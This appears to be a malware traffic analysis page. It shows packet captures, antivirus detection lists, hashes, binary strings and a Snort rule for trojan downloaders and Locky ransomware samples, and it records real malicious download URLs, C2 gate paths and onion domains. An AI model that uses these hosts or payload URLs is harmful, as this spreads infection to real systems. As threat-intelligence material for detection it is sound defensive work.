Text Example

@getBootstrapCDN TWITTER Malware Trojan Downloader Click Fraud PCAP File Download Traffic Sample batdongsantaynambo.com.vn

2019-05-29 22:03:15.716964 IP 10.1.10.162.49185 > 103.221.223.17.80: Flags [P.], seq 319437355:319437820, ack 122938386, win 16425, length 465: HTTP: GET /wp-content/themes/willgroup/inc/acf/as HTTP/1.1
E…..@…..
.
.g….!.P.
:+.S..P.@)4…GET /wp-content/themes/willgroup/inc/acf/as HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: batdongsantaynambo.com.vn
Connection: Keep-Alive

2019-05-29 22:03:16.670058 IP 103.221.223.17.80 > 10.1.10.162.49185: Flags [P.], seq 7301:8643, ack 465, win 22, length 1342: HTTP
E .fQc..)..}g…
2019-05-29 22:03:16.765568 IP 10.1.10.162.49197 > 204.237.142.161.80: Flags [P.], seq 3885137682:3885138158, ack 3673702138, win 16425, length 476: HTTP: GET /button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&product=simpleshare HTTP/1.1
E…..@…..
.
……-.P……>.P.@)~j..GET /button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&product=simpleshare HTTP/1.1
Accept: /
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: w.sharethis.com
Connection: Keep-Alive

2019-05-29 22:03:16.791424 IP 209.197.3.15.80 > 10.1.10.162.49196: Flags [P.], seq 4828:5890, ack 449, win 60, length 1062: HTTP
E .N.(@.6…….
.
..P.,..E..d3&P..<….r…….c…ZW.1}.K=Yrnx..{….@..#.s.b.(g.#.$…]..X…/u.876,.W…Y..3j…..>g.j./.”-.w..d…>V..].|……..>x.R…….?…./#0.H..N.g.R’.Xp.H…-.a…..B…..i..N./t..Y….f..L@……..Z…d$..{HZ.PH.H@6.pRT..V…J{.T…&..e…n]……….5…|..WX.#W.:..)…B!.#%Y+……..0…..4….&..Y.Fa…f……e. ..~..>…>b…….]……f…Pi.HL6..#.
..F……v…bL.e………t&U.3MJ2.=bR…V..)<8d1E.p..P…..t..a…..I.v.%..I..v..8..!!X.7.^..:…….O.@..x………..#…..L..’…q.M..H.(…sw….<.9…_.1….( J.&….~>.R.@.yB…..R ..|….GBj/B![…+.1O?..5.. %……..;!…G…zHH…k..$^.Y<..L.,..Kd.;..T ^7..ZFr7….Ibs..x.Y.”3..30.9…9.#&l.A..U).t.R|…. -!u..w…..]..n.V.iW..RB..VVMyq.5.Q..t..r.b&1..I….@…d..”.+…N…,.r$!.X/.mE..9..^…….6.\m.j..”P.!!.X..e…(!……’….. ..{bu..K..’..vp. l………..L..vS..`….H.Acv…. ……$.. ..>.r…..’$……Yf… i…a eIn.b…7.3n……V=.c{.DV=(..l ….Mo
.. …%………(….x…OZs….i……….
2019-05-29 22:03:16.793379 IP 209.197.3.15.80 > 10.1.10.162.49196: Flags [P.], seq 1:448, ack 449, win 60, length 447: HTTP: HTTP/1.1 200 OK
E …$@.6..U….
.
..P.,..2..d3&P..<.I..HTTP/1.1 200 OK
Date: Thu, 30 May 2019 02:03:16 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: “1544639719”
Content-Encoding: gzip
Content-Length: 5442
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 12 Dec 2018 18:35:19 GMT
X-Hello-Human: Say hello back! @getBootstrapCDN on Twitter

2019-05-29 22:03:17.300171 IP 10.1.10.162.49186 > 103.221.223.17.80: Flags [P.], seq 456:903, ack 5552, win 16425, length 447: HTTP: GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1
E…..@….x
.
.g….”.PXQ?.Zb..P.@)….GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1
Accept: /
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: batdongsantaynambo.com.vn
Connection: Keep-Alive

2019-05-29 22:03:17.305502 IP 10.1.10.162.49196 > 209.197.3.15.80: Flags [P.], seq 449:894, ack 5890, win 16425, length 445: HTTP: GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
E…..@…..
.
……,.P.d3&..I.P.@).W..GET /font-awesome/4.3.0/fonts/fontawesome-webfont.eot? HTTP/1.1
Accept: /
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: maxcdn.bootstrapcdn.com
Connection: Keep-Alive

2019-05-29 22:03:20.996939 IP 10.1.10.162.49227 > 103.221.223.17.443: Flags [P.], seq 469823780:469823918, ack 3162838577, win 16425, length 138
E….|@….8
.
.g….K…..$…1P.@)…………….5.~.&..-“a[….. …uB.@g.?E:G…./.5…
….. .
.2.8…….@…………..batdongsantaynambo.com.vn……….
…………..
2019-05-29 22:03:21.000153 IP 10.1.10.162.49226 > 103.221.223.17.443: Flags [P.], seq 1306475388:1306475526, ack 1356580027, win 16425, length 138
E….~@….6
.
.g….J..M.;|P…P.@)…………….5…{..P..+.K3……k-I…..G…../.5…
….. .
.2.8…….@…………..batdongsantaynambo.com.vn……….
…………..
2019-05-29 22:03:21.267277 IP 10.1.10.162.49239 > 104.76.198.161.443: Flags [P.], seq 1456137481:1456137622, ack 2445346460, win 16425, length 141
E…..@…./
.
.hL…W..V.. ….P.@)…………….5.x.[}..o.V;.|.@ ..L….6i……/.5… ….. . .2.8…….C……..!…..c.sharethis.mgr.consensu.org………. ………….. 2019-05-29 22:03:21.286768 IP 104.76.198.161.443 > 10.1.10.162.49239: Flags [P.], seq 2921:3746, ack 141, win 237, length 825 E .a..@.8.(.hL.. . ….W….V…P…,…………0… ……0…. +…..0……0…0……..a..1a./(..F8.,……20190529032056Z0s0q0I0 ..+……….z….’.5…C………a..1a./(..F8.,………Pr…j.:….3….20190529032056Z….20190605023556Z0.. .H………….i.n9.P.|..@…R..>..i…J….4.)K..jn.BTJ…………../.\I.%k..\/x<0.{…C.w..X.’..n!nA….X..)….z.O.7qW.E…W…….:.QG.}S……....yb.u.,.G.. …K*pv.”…….G.6.-.[…’B.K……6.C…
.b..hO……..0=T…..=…Y….7.e./…e..(v.qB…~6..+.k:….K…G…A…….”.l……...mq..[.^..j{..}Wo..a.}....Q......h#e8.l.b...{I..o....A...G......3.......3.....sl.@..67.....W.. ...bz9a.C.I.....E.ksx.i...v5.....v....).../.VT....5.##.bB.”.?……]0…^’l.!…(d….q….{%.>……. .^..E..B.k.H./D…3.p?……h…|m..!.6…w<.tOJ.?~.y.U……..2?…^…..WK\wL…..pqh.9…e.K.…_K ……… 2019-05-29 22:03:21.305611 IP 10.1.10.162.49239 > 104.76.198.161.443: Flags [P.], seq 141:275, ack 3746, win 16425, length 134 E…..@….4 . .hL…W..V……=P.@)……..F…BA…b.(&7e.-d.i…v..”f……^wF3.L….&r..B…=.8.CP.b$.:.ur;………..0.h…….M.Y,.iP.j.3…hze….z…..I.8.K….}.W 2019-05-29 22:03:21.321761 IP 104.76.198.161.443 > 10.1.10.162.49239: Flags [P.], seq 3746:3805, ack 275, win 245, length 59 E .c..@.8.+.hL.. . ….W…=V…P……………..0.y.l..g[..Z………d…..”…3u`Y; …u(..L..B
2019-05-29 22:03:21.329715 IP 103.221.223.17.443 > 10.1.10.162.49225: Flags [P.], seq 8:430, ack 138, win 22, length 422
E ..Y]..
…g…
.
….I^
t…..P…….400 Bad Request

HTTPS is required

This is an SSL protected page, please use the HTTPS scheme instead of the plain HTTP scheme to access this URL.

Hint: The URL should starts with https://


Powered By LiteSpeed Web Server

http://www.litespeedtech.com

2019-05-29 22:04:14.347717 IP 10.1.10.162.49279 > 198.27.80.143.80: Flags [P.], seq 2027903908:2027904329, ack 3692538470, win 16425, length 421: HTTP: GET /stats/e.php?4214393&@Ab&@R95733&@w HTTP/1.1
E…..@…..
.
…P….Px.[….fP.@)….GET /stats/e.php?4214393&@Ab&@R95733&@w HTTP/1.1
Accept: /
Referer: http://batdongsantaynambo.com.vn/wp-content/themes/willgroup/inc/acf/as
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: s4.histats.com
Connection: Keep-Alive

PCAP Malware Traffic Sample Download Snort Rule Win.Trojan.Gamarue variant POST /panel1/gate.php

 

51 engines detected this file
SHA-256 3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e
File name AU.EXE
File size 572.5 KB
Last analysis 2017-11-29 21:23:27 UTC

Ad-Aware

Trojan.Crypt.Agent.BF

AegisLab

Gen.Variant.Razy!c

AhnLab-V3

Trojan/Win32.Locky.C2242537

ALYac

Trojan.Crypt.Agent.BF

Antiy-AVL

Trojan/Win32.TSGeneric

Arcabit

Trojan.Crypt.Agent.BF

Avast

Win32:Malware-gen

AVG

Win32:Malware-gen

Avira

TR/Crypt.Xpack.binkq

AVware

Trojan.Win32.Generic!BT

Baidu

Win32.Trojan.WisdomEyes.16070401.9500.9999

BitDefender

Trojan.Crypt.Agent.BF

CAT-QuickHeal

TrojanSpy.SpyEyes

Comodo

Backdoor.Win32.Poison.FYRG

 

References:

https://www.hybrid-analysis.com/sample/3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e?environmentId=100

https://www.virustotal.com/#/file/3bf071be282d16696584af13dc38e1c730f127f1b49504408676225d42874e1e/detection

Snort Rule:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:“MALWARE-CNC Win.Trojan.Gamarue variant outbound connection”; flow:to_server,established; content:“POST”; http_method; content:“panel1/gate.php”; content:” HTTP/1.1|0D 0A|Cache-Control: no-cache|0D 0A|Connection|3A|”; fast_pattern:only; content:“+”; depth:15; http_client_body; metadata:impact_flag red, policy securityips drop, ruleset community, service http; sid:1234; rev:1😉

2017-11-29 19:34:59.673041 IP 192.168.1.102.50951 > 198.54.116.113.80: Flags [P.], seq 3095874245:3095874726, ack 2614075121, win 260, length 481: HTTP: GET /au.exe HTTP/1.1
E.. A.@….t…f.6tq…P..J…..P…….GET /au.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: evaroma.zone
Connection: Keep-Alive

2017-11-29 19:35:06.844873 IP 192.168.1.102.50959 > 198.54.116.113.80: Flags [P.], seq 3400751766:3400751989, ack 361817033, win 260, length 223: HTTP: POST /panel1/gate.php HTTP/1.0
E…B.@……..f.6tq…P..Z…..P…….POST /panel1/gate.php HTTP/1.0
Host: evaroma.zone
Connection: close
Content-Length: 80
Accept-Language: en-US
Content-Type: image/jpeg

UR.QQ…U..U.v#..S..Sp.Tvt#..Q..^w.U.v ..”qu’..^vvC..C..C.sC..%..U.._..WtuC..C..
2017-11-29 19:35:08.535037 IP 192.168.1.102.50960 > 198.54.116.113.80: Flags [P.], seq 85791915:85793375, ack 2118066358, win 260, length 1460: HTTP: POST /panel1/gate.php HTTP/1.0
E…B.@……..f.6tq…P….~? .P…….POST /panel1/gate.php HTTP/1.0
Host: evaroma.zone
Connection: close
Content-Length: 14075
Accept-Language: en-US
Content-Type: image/jpeg

@R.]E.VV.S
Z[Y.]v’.r#w.’..Qp.K.. w.$v.W.. q.RtsU..P..#v.Us.”v.P..U..S..K
._..Sv.’..Ts. ..X..S..UsrC..C..$..”qrC..C..#..UsqC.s%pvC..”s.U..U..Tv.U.tC..C..C.. p.U..U.KC..C.rC…e^.VX.A.T..U..T.d.SE.WE.J.U..U.K1{yC.sC..)q.U.d3be…PbK.K.U.@.N.U.KC…..VN.U.K#NbZ.^.TX’s.#wrVs._.uQ..PtrKpsV..VttS.q”..W..KwsV.v^vsK..W..R..S..^..K.sVs.W.vUt.V.:l.G.VD’s.#wrVs._.uQ..PtrKpsV..VttS.q”..W..KwsV.v^vsK..W..R..S..^..K.sVs.W.vUt.V..IB@.Av’.r#w.’..Qp.K.. w.$v.W.. q.RtsU..P..#v.Us.”v.P..U..S..K
._..Sv.’..Ts. ..X?=ZQX.Av’.r#w.’..Qp.K.. w.$v.W.. q.RtsU..P..#v.Us.”v.P..U..S..K
._..Sv.’..Ts. ..XST.]B.FDC.r.]X.^RC.r.]Zk8V.\O…#QX.?=.VA.@C.A^.U.TwT _:lSG…#P^.U.TwT _:lSCC.r.F@ ^VC.r.]Zk8V.EX
S.TwT _:lP^.U.TwT _:lQ.TwZ.\.TwT _:lVX.P[.Q[.Q\C.r.WCk8P ]P
W.TwT _:l[Z…#_V.@X.[[

Malware Trojan Downloader Dropper cubeupload.com PCAP file download traffic analysis

 

 

43 engines detected this file
SHA-256 b069e7d29889bcdcc61e7936ad4800d2563c8618135f40c50e4dbcdc9314f505
File name gfD4vo.jpg
File size 522.61 KB
Last analysis 2017-09-25 22:14:16 UTC

 

FILE 2 – Dropper

 

23 engines detected this file
SHA-256 214325a508b6354286f0ba47afdf998ea8c5b87012d6fac08ec0e7a996ac1999
File name 2602033098198832.exe
File size 266.49 KB
Last analysis 2017-09-25 22:34:21 UTC
Community score -11

 

2017-09-25 16:39:29.774994 IP 192.168.1.102.61160 > 75.75.75.75.53: 16676+ A? i.cubeupload.com. (34)
E..>…….2…fKKKK…5.*z.A$………..i
cubeupload.com…..
2017-09-25 16:39:29.812702 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [S], seq 1274466961, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….|…f..sl…PK……… ……………..
2017-09-25 16:39:29.934339 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [.], ack 217614345, win 256, length 0
E..(..@……..f..sl…PK…… P….b……..
2017-09-25 16:39:30.010343 IP 192.168.1.102.56856 > 46.4.115.108.80: Flags [P.], seq 0:489, ack 1, win 256, length 489: HTTP: GET /gfD4vo.jpg HTTP/1.1
E…..@…}….f..sl…PK…… P…….GET /gfD4vo.jpg HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: i.cubeupload.com
Connection: Keep-Alive

2017-09-25 16:39:30.748418 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [P.], seq 0:139, ack 1, win 256, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
E…T+@…r….f.#.@…P..i|.\.wP…D^..GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

 

2017-09-25 16:39:30.893843 IP 192.168.1.102.56858 > 192.35.177.64.80: Flags [.], ack 1219, win 251, length 0
E..(T,@…s1…f.#.@…P..j..\.9P………….
2017-09-25 16:39:30.924425 IP 192.168.1.102.61163 > 75.75.75.75.53: 19539+ A? isrg.trustid.ocsp.identrust.com. (49)
E..M……. …fKKKK…5.9.ZLS………..isrg.trustid.ocsp identrust.com…..
2017-09-25 16:39:30.942900 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [S], seq 1854319918, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4u.@…Q5…f.#…..Pn……… . ……………
2017-09-25 16:39:31.041398 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [.], ack 2211464567, win 256, length 0
E..(u.@…Q@…f.#…..Pn../..EwP….u……..
2017-09-25 16:39:31.042271 IP 192.168.1.102.56859 > 192.35.177.195.80: Flags [P.], seq 0:247, ack 1, win 256, length 247: HTTP: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
E…u.@…PH…f.#…..Pn../..EwP…….GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: isrg.trustid.ocsp.identrust.com

2017-09-25 16:39:31.187180 IP 192.168.1.102.61164 > 75.75.75.75.53: 10447+ A? ocsp.int-x3.letsencrypt.org. (45)
E..I…….#…fKKKK…5.5..(…………ocsp.int-x3.letsencrypt.org…..
2017-09-25 16:39:31.277686 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [P.], seq 295:812, ack 3052, win 256, length 517
E..-..@…}x…f..sl…..(….dJP….&………..c]..c!.=.AW….cb?.c.R.a…..&..(J$.k.q>?….N!D….w#…X.z.Hy.G..0.AH..”T$~9^..t…[.2…u)”…………U…h…..{.+.d……G.Z{..I\…….8…..{..+%g..).I…O..’…+*.5N.[C>..#…0c….I.y.T~!xy*….p7..1….*
._.X#…..t.o…a…-.i…a..).G…j…zm….4..9…..6…G<s.wX….EOx.x.h.G.{…..>.#q..K…..[.y…D….X…U….K*.’+..D…4…..r=L…..fw..y$i] ..7X….]..\.!.o..<..-fXW…~2..\….&…F..B.$_…\Q.]…..`+..#.:S*..g.5*..>…V…Q{…..S.{|.O…s..6]……].h…….G..%[3..8.+.6r~C.>|.v
2017-09-25 16:39:31.393111 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 5972, win 256, length 0
E..(..@….|…f..sl…..(….o.P………….
2017-09-25 16:39:31.394922 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 8892, win 256, length 0
E..(..@….{…f..sl…..(….{.P….Q……..
2017-09-25 16:39:31.395511 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 11812, win 256, length 0
E..(..@….z…f..sl…..(……P………….
2017-09-25 16:39:31.396583 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 14732, win 256, length 0
E..(..@….y…f..sl…..(……P………….
2017-09-25 16:39:31.397200 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 17652, win 256, length 0
E..(..@….x…f..sl…..(…..RP………….
2017-09-25 16:39:31.508500 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 20572, win 256, length 0
E..(..@….w…f..sl…..(……P…|………
2017-09-25 16:39:31.509234 IP 192.168.1.102.56857 > 46.4.115.108.443: Flags [.], ack 23492, win 256, length 0
E..(..@….v…f..sl…..(…..”P…qI……..

2017-09-25 16:39:48.032574 IP 192.168.1.102.61165 > 75.75.75.75.53: 52627+ A? drazalier.net. (31)
E..;…….0…fKKKK…5.’.^………… drazalier.net…..
2017-09-25 16:39:48.181862 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [S], seq 436295889, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..45.@…^….f>.e&…P..X……. ……………..
2017-09-25 16:39:48.293504 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [.], ack 3080210756, win 256, length 0
E..(5.@…_ …f>.e&…P..X…IDP………….
2017-09-25 16:39:48.300187 IP 192.168.1.102.56861 > 62.210.101.38.80: Flags [P.], seq 0:499, ack 1, win 256, length 499: HTTP: GET /PO/2602033098198832.exe HTTP/1.1
E…5.@…]….f>.e&…P..X…IDP…….GET /PO/2602033098198832.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: drazalier.net
Connection: Keep-Alive

 

Bor.uz Locky Ransomware Malware NO C2 Traffic Analysis PCAP file download

24 engines detected this file
SHA-256 8feb981439774342fbe7c7a25c21d9cbae58f4cc13feb0ebf3657a85f2142158
File name YTkjdJH7w1.exe
File size 591 KB
Last analysis 2017-09-25 15:50:03 UTC

AegisLab

Ransom.Cerber.Smaly0!c

Avast

FileRepMalware

AVG

FileRepMalware

Baidu

Win32.Trojan.WisdomEyes.16070401.9500.9999

CrowdStrike Falcon

malicious_confidence_100% (W)

Cylance

Unsafe

2017-09-25 16:50:29.002420 IP 192.168.1.102.57680 > 75.75.75.75.53: 45408+ A? bor.uz. (24)
E..4…….”…fKKKK.P.5. #..`………..bor.uz…..
2017-09-25 16:50:29.529203 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [S], seq 2670765003, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4\.@….I…f>….=.P.0…….. ……………..
2017-09-25 16:50:29.719862 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [.], ack 1966844122, win 256, length 0
E..(\.@….T…f>….=.P.0..u;..P….A……..
2017-09-25 16:50:29.731330 IP 192.168.1.102.56893 > 62.209.133.18.80: Flags [P.], seq 0:479, ack 1, win 256, length 479: HTTP: GET /YTkjdJH7w1 HTTP/1.1
E…\.@….t…f>….=.P.0..u;..P…d~..GET /YTkjdJH7w1 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: bor.uz
Connection: Keep-Alive

2017-09-25 16:50:32.505137 IP 192.168.1.102.56894 > 62.209.133.18.80: Flags [P.], seq 0:268, ack 1, win 256, length 268: HTTP: GET /favicon.ico HTTP/1.1
E..4]Y@….y…f>….>.P.E..j^e’P…….GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Host: bor.uz
Connection: Keep-Alive

 

 

======================================

BINARY STRINGS

++++++++++++++++++++++++++++++++++++++

 

This program cannot be run in DOS mode.
.text
`.rdata
@.data
.rsrc
=o)A
GGWPP
Proc
essMh@)A
hVirt
hvQ3r_Q
DSDS
CreateDesktopW
IsDialogMessageW
IsCharUpperA
LoadIconA
LoadMenuW
PostMessageA
LoadStringW
LoadCursorA
DrawStateW
MessageBoxA
GetClassLongA
DispatchMessageW
GetPropA
user32.dll
LeaveCriticalSection
GetModuleHandleW
GetFileAttributesW
FindNextFileA
GetConsoleAliasW
GetCurrentThread
SearchPathW
GetStringTypeA
GetProcAddress
GetExpandedNameW
GetLogicalDriveStringsA
GetProfileSectionA
GetCurrentProcess
LoadLibraryA
WaitNamedPipeA
GetTempPathW
WaitForSingleObject
GetModuleFileNameA
IsBadReadPtr
kernel32.dll

NEW LOCKY RANSOMWARE VARIANT g46mbrrzpfszonuk.onion NO C2 PCAP file download traffic analysis

49 engines detected this file
SHA-256 ce48b278f8b823c25b222a33027248299bff3cdc2a6bdb0fdceecb0922dd790a
File name jhdsgvc74
File size 653 KB
Last analysis 2017-09-25 08:23:44 UTC
Community score -78

ESET-NOD32

Win32/Filecoder.Locky.L

F-Secure

Trojan.RanSerKD.12397146

Fortinet

W32/Locky.FWSD!tr.ransom

GData

Trojan.RanSerKD.12397146

Ikarus

Trojan.Win32.Filecoder

K7AntiVirus

Trojan ( 0051497b1 )

K7GW

Trojan ( 0051497b1 )

Kaspersky

Trojan-Ransom.Win32.Locky.ztt

2017-09-25 17:50:32.217002 IP 192.168.1.102.58790 > 75.75.75.75.53: 46557+ A? ar-inversiones.com. (36)
E..@…….:…fKKKK…5.,……………ar-inversiones.com…..
2017-09-25 17:50:32.397644 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [S], seq 2979498304, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4M5@…KU…f%.z4.’.P…@…… ……………..
2017-09-25 17:50:32.546454 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [.], ack 2169675136, win 256, length 0
E..(M6@…K`…f%.z4.’.P…A.R..P….w……..
2017-09-25 17:50:32.556435 IP 192.168.1.102.57127 > 37.247.122.52.80: Flags [P.], seq 0:490, ack 1, win 256, length 490: HTTP: GET /jhdsgvc74 HTTP/1.1
E…M7@…Iu…f%.z4.’.P…A.R..P…0C..GET /jhdsgvc74 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: ar-inversiones.com/jhdsgvc74
Connection: Keep-Alive

 

2017-09-25 17:52:34.606370 IP 192.168.1.102.50739 > 75.75.75.75.53: 28660+ A? lordmartins.com. (33)
E..=…….;…fKKKK.3.5.).-o…………lordmartins.com…..

 

2017-09-25 17:53:19.760276 IP 192.168.1.102.64353 > 75.75.75.75.53: 11634+ A? g46mbrrzpfszonuk.onion. (40)
E..D…….’…fKKKK.a.5.0..-r………..g46mbrrzpfszonuk.onion…..